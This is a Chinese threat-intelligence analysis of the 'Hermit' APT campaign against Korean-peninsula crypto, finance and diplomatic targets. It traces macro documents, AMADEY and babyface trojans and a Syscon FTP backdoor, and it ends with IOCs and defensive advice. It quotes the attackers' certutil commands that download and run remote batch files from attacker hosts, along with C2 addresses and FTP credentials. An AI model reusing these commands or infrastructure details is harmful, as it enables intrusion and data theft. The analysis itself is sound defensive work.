Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

栏目: 编程工具 · 发布时间: 5年前

内容简介:腾讯安全御见威胁情报中心曾在2018年12月发布了分析文章:《Hermit(隐士):针对朝鲜半岛的APT攻击活动披露》。近期,腾讯安全御见威胁情报中心再次监测到该组织的新活动。通过分析和溯源,我们发现该攻击活动主要针对区块链、数字货币、金融目标等,但是我们也发现了同样针对外交实体的一些攻击活动。本次攻击活动跟之前的活动相比,技术手段类似,但是也有一定的更新,如通过下载新的doc文档来完成后续的攻击以及使用AMADEY家族的木马。而最终的目标依然为运行开源的babyface远控木马。此外,传统的Syscon/

一、背景

腾讯安全御见威胁情报中心曾在2018年12月发布了分析文章:《Hermit(隐士):针对朝鲜半岛的APT攻击活动披露》。近期,腾讯安全御见威胁情报中心再次监测到该组织的新活动。通过分析和溯源,我们发现该攻击活动主要针对区块链、数字货币、金融目标等,但是我们也发现了同样针对外交实体的一些攻击活动。

本次攻击活动跟之前的活动相比,技术手段类似,但是也有一定的更新,如通过下载新的doc文档来完成后续的攻击以及使用AMADEY家族的木马。而最终的目标依然为运行开源的babyface远控木马。此外,传统的Syscon/Sandy家族的后门木马也依然在进行活跃。

二、攻击技术分析

1、攻击入口

本次攻击采用鱼叉攻击的方式,投递的攻击诱饵为doc文档,信息如下:

文件hash 文件名 文件类型 文档作者 最后修改者 最后修改时间 上传到VT时间
237026e58e0ac6ce109d874d43d3d64e 20190429_13.doc MS Word Document BlueSky BlueSky 2019:04:29 07:22:00 2019-04-30 03:54:41
c0c007ce1a2d9fb8420c421d419f9f87 20190513_8.doc MS Word Document BlueSky BlueSky 2019:05:13 05:25:00 2019-05-15 05:22:20

以20190513_8.doc为例,运行文档后,首先会提示启用宏:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

启用宏代码后,会从 http://fighiting1013.org/2/modif8.doc 下载回来一个新的doc文档,重命名为20190513-8.doc(跟文档同名),然后打开下载回来的文档并关闭原始文档:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

modif8.doc打开后内容如下:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

文档内容跟区块链信息相关:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

打开文档后,同样提示启用宏。宏代码启用后,会执行以下命令:

cmd.exe /q /c copy /Y%windir%\System32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% &&ct -urlcache -split -f http://tgbabcrfv.1apps.com/1.txt && cd /d %TEMP%&& ren 1.txt 1.bat && del /f /q 1.txt && 1.bat

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

该命令首先将certutil.exe复制到%TEMP%目录下并命名为ct.exe,随后利用ct.exe去下载1.txt并拷贝为1.bat,删除1.txt后执行1.bat。

http://tgbabcrfv.1apps.com/1.txt 内容为:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

1.bat批处理文件会去下载3.txt并解码重命名为setup.cab文件。然后解压安装cab文件到%TEMP%目录下,随后运行解压安装后的install.bat。

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

解码后为:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

install.bat将victory.exe移动到 C:\Users\Public\Documents 目录下,并设置注册表自启:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

2、植入的恶意文件分析

1) victory.exe分析

样本通过EnumWindows回调函数进行解密,并创建同名子进程,解密密钥为:”hmrdeuhnetfiovtyeftqodhguhvnqkqurpmaflrpbnyezvwi”:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

对解密出来的PE分析,首先样本会对内置的硬编码进行解密:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

并且收集本地机器信息,包括本地杀软信息:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

收集完成后通过http post发送给服务器,服务器回传信息中包含进一步下载连接。下载地址为: http://fighiting1013.org/2/sp.exe

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

接收到服务器回传信息后,会去下载地址下载可执行程序并运行:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

而通过访问该木马的C2,可以发现该木马为AMADEY家族的木马:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

2) sp.exe分析

经过对sp.exe的分析,该RAT跟之前我们曝光的一样,同样为babyface远控:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

C2为5.252.198.93:7337

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

木马向C2服务器发送数据

三、   关联分析

1、 同Hermit(隐士)行动的关系

无论是宏代码,还是解码方式,还是最终的脚本形式,都跟之前我们披露的Hermit(隐士)行动一致,而隐士行动跟syscon以及konni的关系,之前的文章已经有比较详细的描述,本文就不再赘述;

如之前的行动的执行脚本:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

宏代码:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

都跟本次的攻击活动类似。此外,作者的信息同样都为BlueSky:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

而从基础设施上,依然喜欢使用一些动态的域名来进行攻击,如1apps、000webhostapp等。

当然,本次攻击行动跟之前比,在技术上也进行了一定小幅度的更新:

1) 采用下载新的文档的形式来执行恶意代码;

2) 采用商用的AMADEY家族木马来进行传播;

2、年初的syscon攻击活动

根据同样的宏特征、基础设施的特征,在腾讯安全御见大数据中心的样本库里,我们同样找到了年初的攻击活动。

攻击诱饵文档:

文件hash 文件名 文件类型 文档作者 最后修改者 最后修改时间 上传到VT时间
68b080cdc748e9357e75a65fba30eaa7 igtaud.doc MS Word Document N/A Windows User 2019:01:21 23:36:00 2019-01-23 12:57:34

打开后,提示需要启用宏,且文档内容模糊:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

启用宏后:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

宏代码为:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

与之前的攻击的宏代码相似似,本次攻击命令存放在 http://clean.1apps.com/1.txt

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

1.bat的主要功能是主要根据系统类型下载cab文件到本地展开执行,实现木马的安装。

木马核心功能:

经分析,本次使用的SYSCON后门使用ftp协议进行控制,这也是该后门最大的特点,木马首先会读取同目录下的同名ini文件,并将其解密得到存放C2地址的url链接: http://clean.1apps.com/4.txt ,将该文件下载解密后得到C2的地址,以及使用的ftp用户名和密码。

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

从同名.ini文件中读取配置信息,解密后得到一个url(这是本次版本最大的变化之处,之前解密后直接得到C2)

将url指向的文件下载回来存为temp.ini,使用相同的方法解密后得到C2:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

其中,C2信息为:

 FTP Server:ftpupload.net >>185.27.134.11
 UserName:b9_23329410
 PASS WORD:tailung

解密出配置信息后,通过运行systeminfo和tasklist命令来收集系统信息,收集后输出到temp.ini,并压缩上传到C2中,上传的文件名格式为to + 计算机名 + 时间:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

上传systeminfo 、tasklist结果到C2,然后查找C2上的名为toeveryone 的文件,读取内容解密后得到命令进行命令分发:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

所支持命令如下:

命令 功能
cmd /c 带/user标志 以explorer权限执行命令
带/stext或> 执行命令并把结果输出到temp.ini
不带任何标志 WinExec执行指定命令
pull 上传指定文件
chip 通过修改配置文件实现修改木马C2
put 移动文件

相关的控制命令:

to everyone (0).txt:

用rundll32 加载%appdata%\Microsoft\Office\qsisxkey.dll调用SetupHook接口

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

to everyone (1).txt:上传%appdata%\Microsoft\Office\qsisxkey.txt

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

to everyone (2).txt:执行dir命令,列举目录%appdata%\Microsoft\Office\

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

to everyone (3).txt:删除%appdata%\Microsoft\Office\qsisxkey.txt

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

从本次的活动来看,所使用的恶意文件为该组织较传统的Syscon/Sandy木马。

3、更多的行动

从最终的c2:5.252.198.93,我们又关联到其他的攻击样本,

如:0072b08eb4c1fe2201c52e26833beeb0

该文件同样会下载txt并利用certutil.exe进行解密:

http://csewater.co.kr/workfolder/work/monitor/1.txt

http://csewater.co.kr/workfolder/work/monitor/setup.txt

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

下载回的内容如下:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

解码后命名为setup.cab:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

解压执行install.bat:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

然后启动ntutil.exe:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

ntutil.exe利用EnumWindows回调函数进行解密,解密出一个新的PE并创建同名子进程。解密key为:

“thxlezgblyteznaulbwwdzkczexrpbmatepgzkqjyttbbsav”

对解密后的样本为一样为Babyface:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

C2为解密后的winnet.ini中的内容:5.252.198.93:7337

同样,我们将该行动归属到本次的隐士行动中。而根据该文件,我们又扩展得到大量的文件,且均可归属到该行动中。而从诱饵内容来看,都跟朝鲜半岛的数字货币、金融等相关,跟本次攻击行动的一致。

如:3e4015366126dcdbdcc8b5c508a6d25c

执行命令:C:\WINDOWS\system32\cmd.exe /c C: && cd %TEMP% &&certutil -urlcache -split -f http://s8877.1apps.com/vip/1.txt && ren1.txt 1.bat && 1.bat && exit

诱饵内容:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

如:dabccfdd50e593a8cb961a39296f0edf

执行命令:

C:\Windows\system32\cmd.exe /c C: && cd%TEMP% && certutil -urlcache -split -fhttps://071790.000webhostapp.com/vic/1.txt && ren 1.txt 1.bat&& 1.bat && exit

诱饵内容:

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

又如:268fb8da9c7d4c18d0ea1e9a3cbbc449

执行命令:

C:\Windows\system32\cmd.exe /c C: && cd%TEMP% && certutil -urlcache -split -f http://s8877.1apps.com/vip/1.txt&& ren 1.txt 1.bat && 1.bat && exit

诱饵内容:

又如:f2d2a2ea4654b2369378fae0b4b9574d

执行命令:

C:\Windows\system32\cmd.exe /c C: && cd%TEMP% && certutil -urlcache -split -f http://a7788.1apps.com/att/1.txt&& ren 1.txt 1.bat && 1.bat && exit

诱饵内容:

4、同TA505的关系

我们发现,本次的诱饵内容同TA505的诱饵类似:

如文件:51ce85fdf98e29acf3cce5493888b6bb

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

而前段时间,TA505同样使用AMADEY家族的木马来进行传播。

此外,TA505同样被认为是一支来自于朝鲜半岛的攻击组织,组织目标为金融、数字货币等,跟该攻击活动也有一定的重合。

当然我们也暂未发现更多的强证据来证明TA505同隐士的关系,我们也会持续保持跟踪。

四、   解决方案

Hermit(隐士)的活跃地区为世界热点地区,离我国很近,我们提醒国内有关单位、企业在日常工作中,注意采取一些必要的安全措施,防止成为APT攻击的受害者:  

1、不要打开不明来源的邮件附件;

2、及时打系统补丁和重要软件的补丁;

3、小心处理Office文档,除非确认文档来源可靠,充分了解打开文档的后果,否则务必不要开启Office启用宏代码;

4、推荐部署腾讯御点终端安全管理系统防御病毒木马攻击;

5、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

五、   附录

1、IOCs

MD5:

 c0c007ce1a2d9fb8420c421d419f9f87
 c0c007ce1a2d9fb8420c421d419f9f87
 9768b1208506e7f026625be173cdb2ee
 a59dbf872d4d275415caed24f93a4d02
 eb800f555ad690d99d34b1a3b05f610a
 a9bd8c69ba5ea70002e776c9f618157b
 43cbadadaead6f11295bf8843bd909ed
 68b080cdc748e9357e75a65fba30eaa7
 2df5a0be61f9b09f380a3fc20945afc0 
 ed527d42819ad7ed9bbaa2791e8bb445 
 46f3540f9a850d3114261e9f1c88100d 
 63dc47d134d7dade7fa3e290d879eba4 
 5968b80e0567a25909273ccf3527dd83 
 63dc47d134d7dade7fa3e290d879eba4 
 ed527d42819ad7ed9bbaa2791e8bb445 
 a5406729bf6acda782022ac5486436c3 
 a9bd8c69ba5ea70002e776c9f618157b
 3e4015366126dcdbdcc8b5c508a6d25c
 7d842177155e20b7b42b0a68ba9081e3
 f2d2a2ea4654b2369378fae0b4b9574d
 dabccfdd50e593a8cb961a39296f0edf
 d896402609e63fc48c7f2433b10c1038
 f38d61237d4ecfb87b58cfcd4fd9dd44
 c2c2a8e9c5b8298d77a225bf3476b7ae
 268fb8da9c7d4c18d0ea1e9a3cbbc449
 fb42ddf48bc581fb9aa8d13f1e4636d1

C&C:

 tgbabcrfv.1apps.com
 fighiting1013.org
 charley-online.com
 5.252.198.93:7337
 alabamaok0515.1apps.com
 mail.naver-download.com
 clean.1apps.com
 ftpupload.net
 s8877.1apps.com
 hanbosston.000webhostapp.com
 a7788.1apps.com/att
 071790.000webhostapp.com
 attach10132.1apps.com
 881.000webhostapp.com

pdb:

 c:\miniprojects\x86il\il86\x64\release\IL86.pdb
 D:\Attack\DropperBuild\x64\Release\Dropper.pdb

2、参考链接

1) Hermit(隐士):针对朝鲜半岛的APT攻击活动披露

https://s.tencent.com/research/report/613.html

3) TA505 intensifica ciberataques a Chile y Latinoamérica con#FlawedAmmy

https://medium.com/@1ZRR4H/ta505-intensifica-ciberataques-a-chile-y-latinoam%C3%A9rica-con-flawedammy-9fb92c2f0552

4) 한국어 구사 Konni 조직,블루 스카이 작전 ‘Amadey’ 러시아 봇넷 활용

https://blog.alyac.co.kr/2308

*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

松本行弘的程式世界

松本行弘的程式世界

松本行弘 / 鄧瑋敦 / 博碩 / 2010年07月27日

讓Ruby之父教您大師級的程式思考術! 本書以松本行弘先生對程式本質的深層認知、各種技術之優缺點的掌握,闡述Ruby這套程式語言的設計理念,並由此延伸讓您一窺程式設計的奧妙之處。本書內含許多以Ruby、Lisp、Smalltalk、Erlang、JavaScript等動態語言所寫成的範例,從動態語言、函數式程式設計等領域開展您的學習視野。 本書精華: ‧物件導向與抽象化 ‧......一起来看看 《松本行弘的程式世界》 这本书的介绍吧!

随机密码生成器
随机密码生成器

多种字符组合密码

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器